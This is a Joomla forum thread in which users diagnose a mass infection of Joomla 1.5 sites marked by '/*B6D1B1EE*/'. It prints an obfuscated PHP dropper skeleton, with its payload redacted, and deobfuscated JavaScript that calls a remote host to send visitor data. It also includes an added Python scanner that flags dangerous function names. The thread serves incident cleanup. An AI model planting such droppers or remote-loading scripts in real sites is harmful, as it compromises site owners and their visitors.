";} /*B6D1B1EE*/ ?> at top of site
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
";} /*B6D1B1EE*/ ?> at top of site
Hi there, today I noticed I have the text ";} /*B6D1B1EE*/ ?> right at the top of my site, I have googled this and it seems a lot of joomla 1.5 sites have this, but there is no discussion about it.
You can see the other sites in search results:
https://www.google.co.uk/#q=%22%3B%7D+% ... %2F+%3F%3E
I'd like to get rid of it and also know what it is, any help gratefully received!
Thanks
Terry
- dhuelsmann
- Joomla! Master
- Posts: 19659
- Joined: Sun Oct 02, 2005 12:50 am
- Location: Omaha, NE
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
Since the 1.5.x series reached end of life in September 2012, my first guess is that your site has been hacked along with all the others you found.
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
I have found it in my template index file, but can't see any suspicious code near it, odd
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
dhuelsmann wrote: Since the 1.5.x series reached end of life in September 2012, my first guess is that your site has been hacked along with all the others you found.
Yeah I am unsure, I found the text in my templates index file, in this code:
require(YOURBASEPATH . DS . "rt_head_includes.php");
?>
";} /*B6D1B1EE*/ ?>
<?php /*d0eeaa88*/ if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo "
I can't see anything there that looks really suspicious however, can anyone else?
Thanks again
- dhuelsmann
- Joomla! Master
- Posts: 19659
- Joined: Sun Oct 02, 2005 12:50 am
- Location: Omaha, NE
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
Use the site malware scanner at https://sitecheck.sucuri.net/
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Thanks for that, no malware found, but an alert to my outdated version of Joomla
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
no malware found doesn't mean you weren't hacked. you could have been spam link defaced.
i searched that sequence and found that on every site i checked, they were running out of date joomla AND running mod_stats with a variation of statsr57.php or similar n
eg
Code: Select all
/media/stat522.php >
should be no where near the media directory
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Thanks mandville, what would be your course of action? I will try and get the Joomla updated but in the meantime, I am unsure what to do.
I have removed the ";} /*B6D1B1EE*/ ?> from the index.php file and all seems OK, although I know that is just a workaround
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
i edited my post but you should really be looking for the r57 shell file. hints seem to point to php files in the media directory
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
mandville wrote: i edited my post but you should really be looking for the r57 shell file. hints seem to point to php files in the media directory
Thanks, there are no php files in the root of media, and the only text I see in the code near the issue is:
src=/modules/mod_stats/statd0e.php
That doesn't look right to me - I am not a programmer but will look at that file now
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
OK that file contains this:
<?php
$udinrg="\x61"."\x73"."\x73"."\x65".chr(114).chr(116);
$blmjnrcdi=chr(98)."a"."s"."e"."\x36"."\x34".chr(95)."d"."\x65".chr(99)."o"."\x64"."e";
@$udinrg(
@$blmjnrcdi(
'='));
## ###############################################################################
Last edited by mandville on Mon Aug 29, 2016 7:04 pm, edited 1 time in total.
Reason: Redacted hack code
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
i redacted the code just in case. you should run and post the fpa so we can see what else is going on. or you could just follow the hacked site sticky and rebuild using the latest secure version
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
mandville wrote: i redacted the code just in case. you should run and post the fpa so we can see what else is going on. or you could just follow the hacked site sticky and rebuild using the latest secure version
Hi there, I have run the FPA, would you like me to PM you the url to it or paste any info here?
Thanks for the help so far, it really is appreciated.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
please post as per instructions
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Forum Post Assistant (v1.2.7) : 29th August 2016 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: user_1075945597 (uid: 1/gid: 1) | Group: root (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.18-410.el5.centos.plus | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/linweb32/t/mywebsiteaddress-1075945598/user/htdocs | System TMP Writable: Yes
PHP Configuration :: Version: 5.2.17 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 6143 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 20M | Max. POST Size: 20M | Max. Input Time: 60 | Max. Execution Time: 60 | Memory Limit: 64M
MySQL Configuration :: Version: 5.0.95-log (Client:5.1.50) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 62.57 MiB | #of Tables: 697
Detailed Environment :: wrote:
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bz2 () | calendar () | ctype () | curl () | hash (1.0) | filter (0.11.0) | ftp () | gettext () | gmp () | session () | iconv () | pcntl () | posix () | readline () | Reflection (0.1) | standard (5.2.17) | shmop () | SimpleXML (0.1) | SPL (0.2) | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | cgi-fcgi () | bcmath () | dbase () | dom (20031129) | gd () | imap () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | soap () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.8.11) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: suhosin |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) :: podcast/ (707) |
Extensions Discovered :: wrote:
Components :: SITE :: Default (1.0.0) | User (1.5.0) | Wrapper (1.5.0) | MailTo (1.5.0) |
Components :: ADMIN :: Trash (1.0.0) | Language Manager (1.5.0) | Mass Mail (1.5.0) | Cache Manager (1.5.0) | PhocaGallery (2.8.1) | Akeeba (3.4.3) | RokCandy (0.87a) | Content Page (1.5.0) | AceSEF (1.5.20) | Mail To (1.5.1) | User (1.5.1) | Polls (1.5.0) | Wrapper (1.5.0) | AceSEF (1.5.1) | Banners (1.5.2) | Search (1.5.1) | Web Links (1.5.1) | Content (1.5.12) | Contact (1.5.3) | News Feeds (1.5.1) | Configuration Manager (1.5.0) | RokQuickCart (1.1) | Module Manager (1.5.0) | AcyMailing Tag : insert Virtue (1.2.1) | AcyMailing : share on social n (1.0.0) | AcyMailing Editor (beta) (4.7.2) | AcyMailing Manage text (1.0.0) | AcyMailing : Handle Click trac (3.0.0) | AcyMailing Tag : JomSocial Use (3.0.0) | AcyMailing Module (3.7.0) | AcyMailing Tag : Subscriber in (4.7.2) | AcyMailing Tag : Date / Time (4.7.2) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing Tag : Manage the Su (4.7.2) | AcyMailing Template Class Repl (4.7.2) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing Tag : VirtueMart pe (3.0.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : (auto)Subscribe d (4.7.2) | AcyMailing Tag : Insert a Modu (3.0.0) | AcyMailing Tag : content inser (3.7.0) | AcyMailing Tag : Joomla User I (4.7.2) | AcyMailing Tag : Website links (3.7.0) | AcyMailing (4.7.2) | Contact Items (1.0.0) | Control Panel (1.5.0) | Frontpage (1.5.0) | Media Manager (1.5.0) | Weblinks (1.5.0) | Newsfeeds (1.5.0) | RokNavMenu Bundle (1.7.5) | CK Forms (1.3.5) | Template Manager (1.5.0) | Xmap (1.2.14) | JEvents Plugin (1.0.3) | lknAnswers Plugin (1.5.0) | DOCman Plugin (1.5.0) | Rokdownloads Plugin (1.0.4) | Kunena Plugin (1.0.2) | Agora Plugin (1.0.0) | JoomGallery Plugin (1.5.1) | Hot Property Plugin (1.0.1) | JMovies Plugin (1.5.0) | KnowledgeBase Plugin (1.0.0) | RD-Autos Plugin (1.5.0) | Mosets Tree Plugin (1.0.1) | MyBlog Plugin (1.5.1) | Remository Plugin (1.0.3) | JCALPro Plugin (1.0.0) | SectionEx Plugin (1.0.2) | Yoflash XMap Plugin (0.0.1) | AcyMailing Plugin (1.0.0) | Eventlist Plugin (1.0.0) | JoomSuite Resources Plugin (1.0.0) | Zoo Plugin (1.0.4) | CMS Shop Builder Plugin (1.5.0) | JoomDOC Extension (1.0.0) | SOBI2 Plugin (1.5.1) | Rapid Recipe Plugin (1.0.0) | Virtuemart Plugin (1.1.4) | Web Links Plugin (1.5.1) | Content Plugin (1.5.1) | RSGallery2 Extension (1.0.0) | JDownloads Plugin (1.5.1) | Gallery2 Bridge Plugin (1.0.2) | Contacts Plugin (1.0.1) | Jomres Plugin (1.0) | Glossary Plugin (1.5.2) | Banners (1.5.0) | Menus Manager (1.5.0) | User Manager (1.5.0) | Polls (1.5.0) | Error404 (2.7) | Installation Manager (1.5.0) | JCalPro (2.1.0 (build_) | Search (1.5.0) | RokModule (1.1) | Messaging (1.5.0) | Plugin Manager (1.5.0) |
Modules :: SITE :: Most Read Content (1.5.0) | Footer (1.5.0) | Countdown (0.0. | RokTabs (1.5) | RokStories (@VERSION@) | RokNavMenu (1.7.5) | ARI Image Slider (2.1.4) | JCal Pro Mini-calendar (2.1.0 (build_) | Share (1.0.0) | Feed Display (1.5.0) | Banner (1.5.0) | JS FlexSlider (1.1) | AcyMailing Module (3.7.0) | RokContentRotator (1.5) | ITPFacebookLikeBox (1.2) | Phoca Gallery Image Module (2.7.5) | RokMicroNews (1.1) | CKforms Form Display (1.3.4) | Login (1.5.0) | Breadcrumbs (1.5.0) | RokNewsPager (@VERSION@) | Search (1.0.0) | RokAjaxSearch (1.2) | Udjamaflip's Sociable Module b (1.5.0) | ValAddThis (2.5.2) | Variation Chooser (1.0.0) | Newsflash (1.5.0) | JCal Pro Latest Events (2.1.0 (build_) | Sections (1.5.0) | Who\'s Online (1.0.0) | Google Driving Directions (1.1) | Archived Content (1.5.0) | Random Image (1.5.0) | Poll (1.5.0) | Related Items (1.0.0) | Statistics (1.5.0) | mod_btslideshow (1.1.0) | ITPSocialButtons (1.5) | Custom HTML (1.5.0) | Follow Me (1.5.7) | ITPShare (1. | Latest News (1.5.0) | Syndicate (1.5.0) | Phoca Facebook Comments (1.0.7) | RokTwittie (0.1) | AlphaTwitter (1.0.2) | Menu (1.5.0) | Wrapper (1.0.0) | Rapid Contact (1.1) |
Modules :: ADMIN :: Quick Icons (1.0.0) | Footer (1.0.0) | Logged in Users (1.0.0) | Latest News (1.0.0) | AceSEF - Quick Icons (1.5.0) | Feed Display (1.5.0) | Admin Menu (1.0.0) | Login Form (1.0.0) | Unread Items (1.0.0) | Akeeba Backup Notification Mod (3.4.3) | User Status (1.5.0) | Items Stats (1.0.0) | Custom HTML (1.5.0) | Title (1.0.0) | Popular Items (1.0.0) | Toolbar (1.0.0) | Online Users (1.0.0) | Admin Submenu (1.0.0) |
Plugins :: SITE :: System - SEF (1.5) | System - Legacy (1.5) | Akeeba Backup Lazy Scheduling (3.3) | System - Log (1.5) | System - AceSEF Meta Manager ( (1.5.0) | System - RokGZipper (1.5) | System - Debug (1.5) | AcyMailing : (auto)Subscribe d (4.7.2) | System - Backlinks (1.5) | Google Maps (2.14) | System - RokCandy (0.87a) | System - AceSEF (1.5.0) | System - Remember Me (1.5) | System - RokBox (2.0) | System - Cache (1.5) | System - Canonicalization (-) | System - Mootools Upgrade (1.5) | Search - Weblinks (1.5) | Search - Sections (1.5) | Search - Categories (1.5) | Search - Contacts (1.5) | JCal Pro Search plugin (2.1.0 (build_) | Search - Content (1.5) | Search - Newsfeeds (1.5) | User - Example (1.0) | User - Joomla! (1.5) | Content - Load Modules (1.5) | ValAddThis (1.5.4) | Content - Perfect Link with Ar (2.0.12PRO) | Content - Slimbox (1.0) | Content - Example (1.0) | Content - CKforms Data Display (1.3.4) | JCalPro Latest Events plugin (2.1.0 (build_) | Phoca Gallery Plugin (2.7.7) | Content - Page Navigation (1.5) | Content - pPGallery (4.313) | Content - CKforms Form Display (1.3.4) | Content - Pagebreak (1.5) | Content - Vote (1.5) | Content - Email Cloaking (1.5) | Content - RokBox (1.4) | Simple Image Gallery (by Jooml (2.2) | Content - Code Highlighter (Ge (1.5) | load module into article (1.1.0) | AcyMailing Tag : insert Virtue (1.2.1) | AcyMailing Manage text (1.0.0) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing Tag : Manage the Su (4.7.2) | AcyMailing Tag : Date / Time (4.7.2) | AcyMailing Tag : JomSocial Use (3.0.0) | AcyMailing Tag : Website links (3.7.0) | AcyMailing Template Class Repl (4.7.2) | AcyMailing : share on social n (1.0.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : Handle Click trac (3.0.0) | AcyMailing Tag : Joomla User I (4.7.2) | AcyMailing Tag : Insert a Modu (3.0.0) | AcyMailing Tag : VirtueMart pe (3.0.0) | AcyMailing Tag : Subscriber in (4.7.2) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Tag : content inser (3.7.0) | Authentication - Example (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | Authentication - OpenID (1.5) | Authentication - Joomla (1.5) | Editor - RokPad (0.7) | AcyMailing Editor (beta) (4.7.2) | Editor - TinyMCE 3 (3.2.6) | Editor - XStandard Lite for Jo (1.0) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | Button - RokCandy (0.87a) | Button - Image (1.0.0) | Button - Pagebreak (1.5) | Button - Readmore (1.5) | RokNavMenu - Boost (1.7.5) | RokNavMenu - Extended Link (1.7.5) |
Templates Discovered :: wrote:
Templates :: SITE :: beez (1.0.0) | jTemplate (1.0.3) | rt_iridium_j15 (1.5.0) | rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) |
Templates :: ADMIN :: Khepri (1.0) |
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
summary
extensions out of date
folder podcast incorrect permission no related extension
php version out of date
etc
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Fledgling
- Posts: 4
- Joined: Tue Aug 30, 2016 2:30 pm
Re: ";} /*B6D1B1EE*/ ?> at top of site
Sites I maintain were also hit by this in the past 48 hours. This was embedded into every template, where XXX is a random 3 characters:
http://pastebin.com/redacted
The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))) Then with a bit of cleanup and some deobfuscation (the comments are a part of the exploit code) we get:
http://pastebin.com/redacted
This is downloading from hxxp://redacted.net/id4.php the following:
http://pastebin.com/redacted
which then downloads this from hxxp://redacted.net/id4.php?id=4 :
http://pastebin.com/redacted
Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I'm still looking into how this was embedded into the templates though.
Last edited by mandville on Tue Aug 30, 2016 4:34 pm, edited 1 time in total.
Reason: redacted link - do not link to hacking scripts
-
- Joomla! Fledgling
- Posts: 4
- Joined: Tue Aug 30, 2016 2:30 pm
Re: ";} /*B6D1B1EE*/ ?> at top of site
Seeing as a mod gutted my previous post of all useful information, and I can't edit it, this should hopefully avoid "linking to hacking scripts" despite the fact that anything I linked to was the result of being hacked, not a script to hack a Joomla site in the first place. This is a potentially huge issue in the works and there needs to be some place to discuss it, seeing as this thread is the first 3 google results for "B6D1B1EE" this thread should provide the info required to diagnose and resolve this breach. 36 hours ago this affected 36,000 sites, 6 hours ago it affected 89,000 sites, now it is affecting 118,000 sites. While this intrusion itself isn't successfully doing anything, whatever entry point it is using is still there.
If your site is showing "B6D1B1EE" in the header you need to search every template for this code and remove it:
This is not a "hacking script," this is what every infected template needs to have removed from it; not making this information easily available is harmful to anyone who is forced to still maintain a Joomla 1.5 site
http://pastebin.com/CaP85wrM
You then need to remove the statXXX.php file that has been placed into your /modules/mod_stat/ directory. The script also places 2 files in your /tmp directory, but they are just used for storing timestamps, but feel free to empty that directory as well (it is just temporary after all).
The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))) Then with a bit of cleanup and some deobfuscation we get some code that overcomplicates downloading a simple javascript file and attempting to embed it in the header of every page view. The code also leaves dangling connections, which results in the server's memory being clogged more and more after every page view; restarting apache seemed to fix that.
The malicious code is downloading from hxxp://censored.net/id4.php the following:
This is not a "hacking script," it is a simple javascript include
Code: Select all
var script = document.getElementById("scriptData"); //createElement("script");
script.src="http://censored.net/js/analytic.php?id=4";
//document.head.appendChild(script);
which then downloads this from hxxp://censored.net/id4.php?id=4 :
This is not a "hacking script," it is simple javascript for getting the timezone and screen size
Code: Select all
<!--
function tzSignature() {
var tz;
try {
var currDate = new Date();
var currTime = currDate.toString();
tz = currDate.getTimezoneOffset();
if ( (currTime.indexOf("PDT") > 0) ||
(currTime.indexOf("MDT") > 0) ||
(currTime.indexOf("CDT") > 0) ||
(currTime.indexOf("EDT") > 0) ||
(currTime.indexOf("Daylight") > 0) )
tz += 60;
tz = - tz / 60;
} catch (e) {
tz = "";
}
return tz;
}
function rsSignature() {
var rs;
try {
var rsWidth = screen.width;
var rsHeight = screen.height;
var rs = rsWidth + "x" + rsHeight;
} catch (e) {
rs = "";
}
return rs;
}
var script = document.createElement("script");
script.src="http://censored.net//js/analytic.php?id=4&tz="+tzSignature()+'&rs='+rsSignature();
document.head.appendChild(script);
//document.write('<sc'+'ript type="text/javascript" src="http://censored.net//js/analytic.php?id=4&tz='+tzSig$
//-->
Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I've tried every UTC offset and every common desktop/tablet/phone resolution and in every attempt it just returns the exact same script, which if the exploit code was actually working as intended would loop infinitely.
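Added example (not the forum's or Joomla's code): a Python scan for the traces MiscCoder lists above (the marker in every template, the statXXX.php dropped into modules/mod_stats) together with the chr()/"\xNN" string-building seen in the redacted statd0e.php posted earlier in the thread. The MOD_STATS_KNOWN file list and the sample tree it builds are assumptions constructed for the run.

```python
"""Indicator scan for the Joomla 1.5 infection described in this thread (added
example, not forum or Joomla code): the /*B6D1B1EE*/ marker in templates, a
stray PHP file under modules/mod_stats, and a dropper spelling assert /
base64_decode out of chr() and "\\xNN" fragments before calling them."""
import os
import re
import tempfile

MARKER = "/*B6D1B1EE*/"
# names a legitimate module has no reason to assemble byte by byte
DANGEROUS = {"assert", "eval", "base64_decode", "system", "passthru", "shell_exec"}
# assumption for this example: the PHP files mod_stats is expected to contain
MOD_STATS_KNOWN = {"mod_stats.php", "helper.php"}
# one fragment of a PHP concatenation: chr(N), a "..." literal or a '...' literal
_FRAG = re.compile(r'chr\((\d+)\)|"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
# a plain assignment; the right-hand side must not itself contain ';'
_ASSIGN = re.compile(r'\$(\w+)\s*=\s*([^;]+);')


def _unescape(lit, single_quoted):
    """PHP escapes that matter here: \\xNN, \\n, \\t and backslash-quote."""
    if single_quoted:
        return lit.replace("\\'", "'").replace("\\\\", "\\")
    return re.sub(r'\\x([0-9A-Fa-f]{1,2})|\\(.)',
                  lambda m: chr(int(m.group(1), 16)) if m.group(1)
                  else {"n": "\n", "t": "\t"}.get(m.group(2), m.group(2)), lit)


def resolve_concat(expr):
    """Statically evaluate an expression made only of chr(N) and string literals
    joined by '.', e.g. "\\x61"."\\x73".chr(115) -> 'ass'; None otherwise."""
    out, pos = [], 0
    for m in _FRAG.finditer(expr):
        if expr[pos:m.start()].strip() not in ("", "."):
            return None
        if m.group(1) is not None:
            out.append(chr(int(m.group(1))))
        elif m.group(2) is not None:
            out.append(_unescape(m.group(2), False))
        else:
            out.append(_unescape(m.group(3), True))
        pos = m.end()
    if expr[pos:].strip() or not out:
        return None
    return "".join(out)


def obfuscated_calls(source):
    """(variable, resolved name) pairs where a dangerous function name is built
    from fragments and then called as $var(...) or @$var(...)."""
    hits = set()
    for m in _ASSIGN.finditer(source):
        var, name = m.group(1), resolve_concat(m.group(2))
        if name in DANGEROUS and re.search(r'@?\$' + re.escape(var) + r'\s*\(', source):
            hits.add((var, name))
    return sorted(hits)


def scan_tree(root):
    """Walk a site root; return sorted (kind, relative path[, detail]) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if MARKER in text:
                findings.append(("marker", rel))
            if (rel.startswith("modules/mod_stats/") and fname.endswith(".php")
                    and fname not in MOD_STATS_KNOWN):
                findings.append(("stray_module_php", rel))
            calls = obfuscated_calls(text) if fname.endswith(".php") else []
            if calls:
                findings.append(("obfuscated_call", rel,
                                 ",".join(sorted({name for _, name in calls}))))
    return sorted(findings)


def build_sample_tree():
    """Constructed tree: a marked template, the dropper as redacted in the thread, two clean files."""
    root = tempfile.mkdtemp(prefix="joomla15_")
    files = {
        "templates/rt_iridium_j15/index.php":
            '<?php\nrequire(YOURBASEPATH . DS . "rt_head_includes.php");\n?>\n'
            '";} /*B6D1B1EE*/ ?>\n',
        "modules/mod_stats/mod_stats.php": "<?php echo 'clean module'; ?>\n",
        "modules/mod_stats/statd0e.php":
            '<?php\n$udinrg="\\x61"."\\x73"."\\x73"."\\x65".chr(114).chr(116);\n'
            '$blmjnrcdi=chr(98)."a"."s"."e"."\\x36"."\\x34".chr(95)."d"."\\x65"'
            '.chr(99)."o"."\\x64"."e";\n@$udinrg(\n@$blmjnrcdi(\n\'=\'));\n',
        "components/com_content/controller.php": "<?php $x = 'harmless'; ?>\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    print(*scan_tree(build_sample_tree()), sep="\n")
```

Point scan_tree at a real site root to get the same three kinds of finding; a marker hit outside templates/ or a stray file in tmp/ is worth a look as well, since the posts above say the dropper also writes there.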
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
not sure why people are "forced" to still be running a 1.5 site. perhaps the same people who are using samsung s2, iphone5, htc wildfire, windows xp or leaded petrol etc [analogy]
as you state we dont allow links to any code that can be used for illegal means.
as stated in previous posts. out of date joomla, possibly out of date php, possibly out of date extensions.
what do you have in common with the OP beyond using 1.5 ?
https://docs.joomla.org/Security_Checkl ... or_defaced is where you should be heading next
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Fledgling
- Posts: 4
- Joined: Tue Aug 30, 2016 2:30 pm
Re: ";} /*B6D1B1EE*/ ?> at top of site
Several clients of the company I work for are small pro-bono/non-profit clients that have zero budget to pay us to update their sites, sites which were established in the mid 2000's. If it were up to me they wouldn't still be on 1.5.26
All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: ";} /*B6D1B1EE*/ ?> at top of site
are the sites you have on 1.5 with the 1.5.26+ patch (or what ever people called it) that was issued after EOL http://joomlacode.org/gf/project/joomla ... m_id=31626
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- ozneilau
- Joomla! Guru
- Posts: 872
- Joined: Tue Aug 04, 2009 9:05 am
- Location: Tasmania, Australia
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
mandville wrote: are the sites you have on 1.5 with the 1.5.26+ patch (or what ever people called it) that was issued after EOL
There are 2 x security hotfixes for Joomla 1.5.26, the Session Hardening patch and the File Upload Security patch which can be found at: https://docs.joomla.org/Security_hotfix ... L_versions
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Aug 31, 2016 11:02 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Hello all,
I'm pretty new to Joomla having been told to fix this issue this morning (pretty stressed).
I actually have the ;} /*B6D1B1EE*/ ?> issue as well as someone POST'ing to Joomla to send spam.
As of this moment, I've deleted Joomla and turned the DB off.
Am I still vulnerable to the exploit?
I can see IP's trying to POST to /libraries/phpxmlrpc/compat/article48.php ...obviously failing because Joomla is no longer there.
cheers in advance
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Aug 31, 2016 11:02 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Actually when I say "Am I still vulnerable to the exploit?" .... I mean what else should I be afraid of?
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
MiscCoder wrote: Seeing as a mod gutted my previous post of all useful information, and I can't edit it, this should hopefully avoid "linking to hacking scripts" despite the fact that anything...
Thanks for all this!
I have removed the statd0e.php file, I had nothing in my temp folder, but from what you say this is a pretty badly written nasty, so no surprises there I guess.
I've checked everything else out and made another backup just in case.
Again, thank you.
-
- Joomla! Apprentice
- Posts: 44
- Joined: Mon Oct 03, 2011 10:17 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
MiscCoder wrote: Several clients of the company I work for are small pro-bono/non-profit clients that have zero budget to pay us to update their sites, sites which were established in the mid 2000's. If it were up to me they wouldn't still be on 1.5.26
All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.
I agree with this, and this is my situation too.
The simple fact is there are a lot of people on 1.5 who don't have the budget to upgrade.
I will however push them to do so after this, hopefully they listen.
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
